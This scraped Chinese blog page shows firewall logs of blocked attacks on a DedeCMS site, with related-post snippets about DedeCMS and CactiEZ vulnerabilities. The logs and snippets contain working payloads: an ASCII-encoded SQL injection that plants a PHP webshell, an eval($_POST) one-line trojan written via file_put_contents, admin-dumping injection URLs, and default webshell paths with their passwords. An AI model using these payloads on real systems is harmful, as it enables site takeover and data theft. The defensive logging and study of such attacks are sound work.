arrs2[]=62&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=44&arrs2[]=32&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=111&arrs2[]=114&arrs2[]=103&arrs2[]=39&arrs2[]=39&arrs2[]=59&arrs2[]=64&arrs2[]=112&arrs2[]=114&arrs2[]=101&arrs2[]=103&arrs2[]=95&arrs2[]=114&arrs2[]=101&arrs2[]=112&arrs2[]=108&arrs2[]=97&arrs2[]=99&arrs2[]=101&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=47&arrs2[]=91&arrs2[]=99&arrs2[]=111&arrs2[]=112&arrs2[]=121&arrs2[]=114&arrs2[]=105&arrs2[]=103&arrs2[]=104&arrs2[]=116&arrs2[]=93&arrs2[]=47&arrs2[]=101&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=36&arrs2[]=95&arrs2[]=82&arrs2[]=69&arrs2[]=81&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=39&arrs2[]=39&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=39&arrs2[]=39&arrs2[]=93&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=101&arrs2[]=114&arrs2[]=114&arrs2[]=111&arrs2[]=114&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=0, 触发规则:316::Dedecms5.7版本注入漏洞防护, 可疑行为:&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120,已被拦截。

站群,2019-12-04 20:35:10,防应用程序漏洞,157.52.144.2(美国加利福尼亚州洛杉矶) 访问 一号号域名/uploads/dede/sys_verifies.php?action=down, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval(base64_decode($_POST,已被拦截。

站群,2019-12-04 20:35:10,防应用程序漏洞,157.52.144.2(美国加利福尼亚州洛杉矶) 访问 一号号域名/utility/convert/data/config.inc.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval(base64_decode($_POST,已被拦截。

站群,2019-12-04 20:35:09,防应用程序漏洞,157.52.144.2(美国加利福尼亚州洛杉矶) 访问 一号号域名/plus/90sec.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval(base64_decode($_POST,已被拦截。

zetachow~~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php安全插件,weathermap 插件 editor.php 的安全性问题
weixin_39783156的博客
04-07 363
最近刚部署完CactiEZ+weathermap+nagios+npc的整合,发现一个问题,weathermap下的editor.php文件是任何人都能访问的,并能修改气象图,如下图。通过google的搜索相关的信息,从Weathermap的网站看到,editor.php是没有做验证的,任何人都可以修改你的气象图配置文件的。但其网站也提供了一个解决方法,如下Order Deny,AllowDeny...
tf-idf实例一
WangYouJin321的博客
01-15 808
#!/usr/bin/env python -- coding:utf-8 -- import nltk import math import jieba import string from nltk.corpus import stopwords from collections import Counter from nltk.stem.porter import * from sklear...
dedecms被注入
____
07-04 520
dedecms这一套程序太火爆了,但是他的sql都是直接拼接的,经常被注入。 GET //plus/erraddsave.php?dopost=saveedit&a=b&arrs 1[]=99&c=d&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=1
CactiEZ weathermap插件任意文件写入
最新发布
m0_49025459的博客
01-17 1333
CactiEZ的登录界面,大多数都会存在weathermap的插件,这样我们就可以尝试该网站是否存在任意文件写入漏洞了。
dedecms的漏洞
https://www.cnblogs.com/zpchcbd/
05-10 2782
5.7 sp1 爆数据库 /plus/search.php?keyword=xxx&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=102&arrs1[]=95&arrs1[]=115&arrs1[]=116&arrs1[]=121&a...
dedecms (织梦)漏洞&exp整理
weixin_34417183的博客
06-13 2692
[通杀]dedecms plussearch.php 注入漏洞利用方式看结果如果提示Safe Alert: Request Error step 2 !那么直接用下面的exp查看源代码打印帮助1/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14...
plus moon.php,[开源] LaravelPlus - 基于 Laravel 魔改,为方便实际业务使用 - 开发中
weixin_39604276的博客
04-11 151
目的为了减少重复 CURD 和新项目的配置麻烦等问题,(就是为了骗星星:LaravelPlus )如:现有的 infyomlabs/laravel-generator CODE 生成工具虽然好用,但是不太喜欢样式和代码结构。有些本地,测试,线上的配置需要频繁改动的需要。多个项目构建引入包,配置扩展等重复性操作介绍LaravelPlus 基于 Laravel 增加部分软件包初始安装和进行业务使用功能...
dedeCMS解码
06-13 200
var str = 'arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1...
http/https服务器安全:嗅探漏洞url路径
zzhongcy的专栏
08-19 6325
这里记录一下我知道的一些经常被黑客嗅探的路径。 1、有些可能是正常路径,比如:GET /robots.txt 2、有些是需要加入安全策略的路径,比如:GET /phpMyAdmin/index.php 这里只是提供参考,大家平时多多注意点吧。 request: "GET / HTTP/1.1", request: "GET /robots.txt HTTP/1.1", request: "POST /Admin16c882df/Login.php HTTP/1.1", request: "GE...
<?php eval($_post[guige]);?>,dedecms漏洞getshell EXP最新可用
weixin_32534669的博客
04-02 274
构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\’`,’{dede:php}file_put_contents(”90sec.php”,””);{/dede:php}’) # @`\’`EXP:http://www.xxx.org/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&am...
plus/mytag_js.php?aid=9090,DeDeCMS(织梦)变量覆盖0day getshell
weixin_35690449的博客
03-23 615
#!usr/bin/php -w<?phperror_reporting(E_ERROR);set_time_limit(0);print_r(´DEDEcms Variable CoverageExploit Author: www.heixiaozi.com www.webvul.com);echo "\r\n";if($argv[2]==null){print_r(´+--------...
dedecms漏洞getshell EXP最新可用
weixin_33674976的博客
06-18 548
构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\’`,’{dede:php}file_put_contents(”90sec.php”,”<?php eval($_POST[guige]);?>”);{/dede:php}’) # @`\’`EXP:http://www.xxx.org/plus/download...
Web应急:管理员账号被篡改
06-10 294
你是某一个网站的管理员,有一天,你的管理员账号admin却登录不了,进入数据库查看,原来管理员账号用户名不存在了,却多了另外一个管理员用户名。不对,不是新增了管理员,而是你的管理员用户名被篡改了。 现象描述 前后端分离,后台只允许内网访问,管理员账号admin却依然被多次被篡改 问题处理 1、网站webshell 在针对网站根目录进行webshell描,发现存在脚本木马,创建...
dedecms注入爆管理员用户密码方法
K的博客
08-23 5758
dedecms注入爆管理员用户密码方法 2014年03月04日18:24 阅读: 1209 次 标签: dedecms注入爆管理员用户密码方法 关键词:powered by dedecms 首先注册个用户,注册地址: /member/index_do.php?fmdo=user&dopost=regnew 爆管理帐号: /member/buy_action.php?produ
织梦dedecms漏洞修复记
06-26 1489
自己用dedecms在阿里云上搭建了套网站,之后阿里云漏洞提示,织梦有多个漏洞需要我修复,发我邮箱,今天整理了下,我遇到的漏洞,及我修复的过程。漏洞描述:dedecms的/member/soft_add.php中,对输入模板参数$servermsg1未进行严格过滤,导致攻击者可构造模版闭合标签,实现模版注入进行GETSHELL。解决办法:打开根目录下/member/soft_add.php(在15...
当了一回网管,见识了一下php的挂码方法
linux内核探索
10-18 4113
当了一回网管好长时间都没有更新博客了。这回也来写一把非研发的东西。问题起因是有一台有固定IP地址的web服务器,然后装的是windows版的。服务器上跑的是一个php的动态站点。后台用的是dedecms做为建站系统。但是最近以来。这个站点一直被挂马。倒底是windows服务器被攻破,还是网站被人上传了恶意的木马?不得而知。每回把服务器重新恢复,没过一段时间,又会被挂马,在首页最下端出现了“百度联盟”
plus/mytag_js.php?aid=9090,织梦模板网站留言板调用网站的head.htm,footer.htm的方法
weixin_36059283的博客
03-23 445
织梦模板网站留言板调用网站的head.htm,footer.htm的方法二,好多人都想在留言本guestbook.htm里实现dede的标签调用,问题是在plus里不支持dede标签的应用。现在有一个简单的办法可以调用标签。拿在留言本调用head.htm实例一般我们在首页调用head是用{dede:include filename="head.htm"/},这在plus里是无效的。我们可以在自定义...
利用安全狗防护DedeCMS v5.7高危注入漏洞 [复制链接]
IT技术宅-北方的刀郎
03-21 8335
漏洞修复版本:DedeCMS v5.7 20130607之后版本http://bbs.safedog.cn/thread-52264-1-1.html       漏洞触发条件:确保php.ini中使用php_mysql.dll同时未开启php_mysqli.dll。       漏洞触发根源:在于/include/dedesql.class.php文件中程序未初始化$arrs1和$arrs2这两
一些收藏默认网站后缀
weixin_30390075的博客
08-30 3149
菜刀链接密码默认 /plus/90sec.php||||尝试用菜刀连接--密码 guige /plus/spider.php||||spider菜刀连接 /plus/x.php||||m菜刀密码m /plus/service.php||||尝试用菜刀连接--密码 fuwu /plus/av.php||||尝试用菜刀连接--密码 110 /plus/bakup.hp||...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值